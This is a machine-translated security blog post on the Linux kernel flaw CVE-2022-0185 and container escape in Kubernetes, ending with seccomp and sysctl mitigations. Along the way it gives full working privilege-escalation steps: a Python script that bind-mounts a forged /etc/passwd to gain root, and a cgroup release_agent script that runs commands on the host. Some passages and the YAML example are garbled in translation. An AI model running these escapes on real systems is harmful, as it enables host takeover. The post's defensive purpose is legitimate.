high-risk!! Kubernetes new container escape vulnerability warning

Posted by gypmaster on Thu, 03 Mar 2022 05:16:15 +0100

Author: michelangela young, preacher KubeSphere, cloud native severely infected

On January 18, 2022, Linux maintainers and vendors in the legacy of Linux kernel (5.1-rc1 +) file system context function_ parse_ An error was found in the param function Heap Buffer Overflow Vulnerability with ID number CVE-2022-0185 , which is a high-risk vulnerability with a severity level of 7.8.

The vulnerability allows for out of bounds writes in kernel memory. Using this vulnerability, an unprivileged attacker can bypass the restrictions of any Linux namespace and elevate his privileges to root. For example, if an attacker infiltrates into your container, he can escape from the container and increase his privileges.

The vulnerability was introduced into Linux kernel version 5.1-rc1 in March 2019. The patch released on January 18 fixes this problem. It is recommended that all Linux users download and install the latest version of the kernel.

Vulnerability details

The vulnerability is caused by the legacy of the file system context function (fs/fs_context.c)_ parse_ Caused by integer underflow condition found in param function. The function of the file system context is to create super blocks for mounting and remounting the file system. Super blocks record the characteristics of a file system, such as block and file size, as well as any storage blocks.

By adding to legacy_ parse_ The param function sends more than 4095 bytes of input, which can bypass the input length detection, resulting in out of bounds writing and triggering the vulnerability. An attacker can use this vulnerability to write malicious code to other parts of memory, resulting in system crash, or execute arbitrary code to enhance privileges.

legacy_ parse_ The input data of param function is through fsconfig Added by the system call to configure the creation context of the file system (such as the superblock of ext4 file system).

// Use the fsconfig system call to add a NULL terminated string pointed to by val
fsconfig(fd, FSCONFIG_SET_STRING, "\x00", val, 0);

To use the fsconfig system call, a non privileged user must have at least in their current namespace CAP_SYS_ADMIN Privileges. This means that if a user can enter another namespace with these permissions, it is sufficient to exploit this vulnerability.

If a non privileged user cannot get a CAP_SYS_ADMIN privilege, which can be obtained by an attacker through an unshare(CLONE_NEWNS|CLONE_NEWUSER) system call. The Unshare system call allows the user to create or clone a namespace or user, thus having the necessary permissions to carry out further attacks. This technology is very important for using Linux namespace to isolate Pod's Kubernetes and container world. An attacker can take advantage of this in the container escape attack. Once successful, the attacker can gain full control of the host operating system and all containers running on the system, so as to further attack other machines in the internal network segment, Malicious containers can even be deployed in Kubernetes clusters.

The research team that discovered the vulnerability on January 25 GitHub Code and proof of concept to exploit the vulnerability were released on.


When Docker and other containers run, Seccomp configuration files are used by default to prevent processes in the container from using dangerous system calls to protect Linux namespace boundaries.

Seccomp (full name: secure computing mode) introduces the Linux kernel in version 2.6.12 (March 8, 2005), limiting the system calls available to processes to four types: read, write_ exit´╝îsigreturn. The initial mode is the white list mode. In this security mode, in addition to the opened file descriptor and the four allowed system calls, if you try other system calls, the kernel will use SIGKILL or SIGSYS to terminate the process.

However, by default, Kubernetes does not use any Seccomp or AppArmor/SELinux configuration files to restrict the system calls of the Pod, which is very dangerous. The processes in the Pod can freely access the dangerous system calls and wait for the opportunity to obtain the necessary privileges (such as CAP_SYS_ADMIN) for further attacks.

Let's take a look at an example of Docker. In the standard Docker environment, the unshare command cannot be used, Seccomp filter of Docker Blocked the system call used by this command.

$ docker run --rm -it alpine /bin/sh
/ # unshare
unshare: unshare(0x0): Operation not permitted

Take another look at Kubernetes' Pod:

$ kubectl run --rm -it test --image=ubuntu /bin/bash
If you don't see a command prompt, try pressing enter.
root@test:/# lsns | grep user
4026531837 user        3   1 root /bin/bash
root@test:/# apt update && apt install -y libcap2 libcap-ng-utils
root@test:/# ......
root@test:/# pscap -a
ppid  pid   name        command           capabilities
0     1     root        bash              chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcap

You can see that the root user in the Pod does not have a CAP_SYS_ADMIN capability, but we can obtain the cap through the unshare command_ SYS_ Admin capability.

root@test:/# unshare -Urm
# pscap -a
ppid  pid   name        command           capabilities
0     1     root        bash              chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcap
1     265   root        sh                full
# lsns | grep user
4026532695 user        3   265 root -sh

So with cap_ SYS_ What can admin do? Here are two examples to show how to use CAP_SYS_ADMIN to penetrate the system.

Ordinary users are authorized as root users!

The following operation can directly promote the ordinary user in the host to the root user.

Give Python 3 a cap first_ SYS_ Admin capability (note that soft links cannot be operated, only the original files can be operated).

$ which python3

$ ll /usr/bin/python3
lrwxrwxrwx 1 root root 9 Mar 13  2020 /usr/bin/python3 -> python3.8*

$ setcap CAP_SYS_ADMIN+ep /usr/bin/python3.8
$ getcap /usr/bin/python3.8
/usr/bin/python3.8 = cap_sys_admin+ep

Create a normal user.

$ useradd test -d /home/test -m

Then switch to ordinary users and enter the user home directory.

$ su test
$ cd ~

Copy / etc/passwd to the current directory and change the password of root user to "password".

$ cp /etc/passwd ./
$ openssl passwd -1 -salt abc password

# Change root:x in the first line to root: $1 $ABC $bxbqpb9bzczhxlgbee 0s/
$ head -2 passwd

Mount the modified passwd file to / etc/passwd.

# cat mount-passwd.py
from ctypes import *
libc = CDLL("libc.so.6")
libc.mount.argtypes = (c_char_p, c_char_p, c_char_p, c_ulong, c_char_p)
MS_BIND = 4096
source = b"/home/test/passwd"
target = b"/etc/passwd"
filesystemtype = b"none"
options = b"rw"
mountflags = MS_BIND
libc.mount(source, target, filesystemtype, mountflags, options)
$ python3 mount-passwd.py

**The last is the moment to witness miracles** Switch directly to the root user and enter the password "password".

$ su root

It's amazing to switch to root...

Let's see if you really get root permission:

$ find / -name "*flag*" 2>/dev/null

$ cat /sys/kernel/debug/block/vdb/hctx0/flags
alloc_policy=FIFO SHOULD_MERGE

Well, that's right.

Finally, remember to uninstall / etc/passwd.

$ umount /etc/passwd

So, system reboot engineers, hurry to see if the ordinary users you assign to others have caps_ SYS_ Admin capability~~

View all processes of the host in the container!

Let's get another example of all the processes running in the container.

We don't need to use the -- privileged parameter to run the privilege container, which will be boring.

$ docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash

Next, execute the following command in the container. The final effect is to execute the ps aux command on the host and save its output to the / output file in the container.

# Mounts the RDMA cgroup controller and create a child cgroup
# This technique should work with the majority of cgroup controllers
# If you're following along and get "mount: /tmp/cgrp: special device cgroup does not exist"
# It's because your setup doesn't have the RDMA cgroup controller, try change rdma to memory to fix it
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
# Finds path of OverlayFS mount for container
# Unless the configuration explicitly exposes the mount point of the host filesystem
# see https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
# Sets release_agent to /path/payload
echo "$host_path/cmd" > /tmp/cgrp/release_agent
# Creates a payload
echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd
# Executes the attack by spawning a process that immediately ends inside the "x" child cgroup
# By creating a /bin/sh process and writing its PID to the cgroup.procs file in "x" child cgroup directory
# The script on the host will execute after /bin/sh exits 
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
# Reads the output
cat /output

Finally, you can see all the processes running in the host in the container:

root@0c84f7587629:/# cat /output
root           1  0.0  0.3 172704 13148 ?        Ss    2021 131:32 /sbin/init nopti
root           2  0.0  0.0      0     0 ?        S     2021   0:18 [kthreadd]
root           3  0.0  0.0      0     0 ?        I<    2021   0:00 [rcu_gp]
root           4  0.0  0.0      0     0 ?        I<    2021   0:00 [rcu_par_gp]
root           6  0.0  0.0      0     0 ?        I<    2021   0:00 [kworker/0:0H-kblockd]
root           8  0.0  0.0      0     0 ?        I<    2021   0:00 [mm_percpu_wq]
root           9  0.0  0.0      0     0 ?        S     2021  18:36 [ksoftirqd/0]
root          10  0.0  0.0      0     0 ?        I     2021 262:22 [rcu_sched]
root          11  0.0  0.0      0     0 ?        S     2021   3:06 [migration/0]
root          12  0.0  0.0      0     0 ?        S     2021   0:00 [idle_inject/0]
root          14  0.0  0.0      0     0 ?        S     2021   0:00 [cpuhp/0]
root          15  0.0  0.0      0     0 ?        S     2021   0:00 [cpuhp/1]

I won't explain the specific meaning of these commands. If you are interested, you can study them against the notes.

To be sure, cap_ SYS_ The admin capability provides more possibilities for attackers, whether in the host or in the container, especially in the container environment. If we are unable to upgrade the kernel due to irresistible factors, we need to find other solutions.


Container layer

From V1 Since version 22, Kubernetes can use SecurityContext to add the default Seccomp or AppArmor configuration file to the resource object to protect Pod, Deployment, Statefulset, daemon, and so on. Although this function is currently in Alpha stage, users can add their own Seccomp or AppArmor configuration file and define it in SecurityContext. For example:

# pod-test.yaml
apiVersion: v1
kind: Pod
  name: protected
    - name: protected
      image: ubuntu
      - sleep
      - infinity
          type: RuntimeDefault

After creating the Pod, try to use unshare to get the CAP_SYS_ADMIN capability.

$ kubectl exec -it protected -- bash
root@protected:/# unshare -Urm
unshare: unshare failed: Operation not permitted

The output results show that if the unshare system call is successfully blocked, the attacker cannot use this ability to attack.

Host level

Another solution is to prohibit users from using user namespace from the host level without restarting the system. For example, in Ubuntu, you only need to execute the following two lines of commands to take effect immediately, and it will take effect after restarting the system.

$ echo "kernel.unprivileged_userns_clone=0" > /etc/sysctl.d/userns.conf
$ sysctl -p /etc/sysctl.d/userns.conf

If it is a Red Hat system, you can execute the following commands to achieve the same effect.

$ echo "user.max_user_namespaces=0" > /etc/sysctl.d/userns.conf
$ sysctl -p /etc/sysctl.d/userns.conf

Summarize the handling suggestions for this vulnerability:

  • If your environment can accept patching the kernel or restarting the system, it's best to patch or upgrade the kernel.
  • Reduced use of access to caps_ SYS_ Privilege container for admin.
  • For non privileged containers, ensure that there is a Seccomp filter to prevent their calls to unshare to reduce the risk. Docker is OK. Kubernetes needs additional operations.
  • In the future, Seccomp profiles can be enabled for all workloads in the Kubernetes cluster. At present, this function is still in Alpha stage and needs to pass feature gate Open.
  • At the host level, users are prohibited from using the user namespace.

Write at the end

The container environment is complex, especially the distributed scheduling platform like Kubernetes. Each link has its own life cycle and attack surface, which is easy to expose security risks. The container cluster administrator must pay attention to the security problems in every detail. Generally speaking, in most cases, the security of the container depends on the security of the Linux kernel. Therefore, we need to pay attention to any security problems at all times and implement the corresponding solutions as soon as possible.

reference material

This article is composed of blog one article multi posting platform OpenWrite release!

Topics: Python Linux Docker bash